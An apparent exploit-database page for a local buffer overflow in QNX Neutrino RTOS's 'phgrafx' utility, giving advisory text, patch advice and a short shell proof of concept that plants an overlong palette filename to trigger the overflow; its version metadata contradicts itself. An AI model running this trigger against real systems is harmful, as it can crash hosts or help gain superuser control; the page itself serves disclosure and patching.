header-logo
Suggest Exploit
vendor:
Neutrino RTOS
by:
SecurityFocus
7.2
CVSS
HIGH
Buffer-Overflow
119
CWE
Product Name: Neutrino RTOS
Affected Version From: 6.3.2002
Affected Version To: 6.3.2000
Patch Exists: YES
Related CWE: N/A
CPE: o:qnx:neutrino_rtos
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

QNX Neutrino RTOS Local Buffer-Overflow Vulnerability

QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.

Mitigation:

Users should apply the appropriate vendor-supplied patches to help mitigate the risk.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30024/info

QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.

Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.

QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.

# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx

Navigation

Suggest Exploit

Services By CQR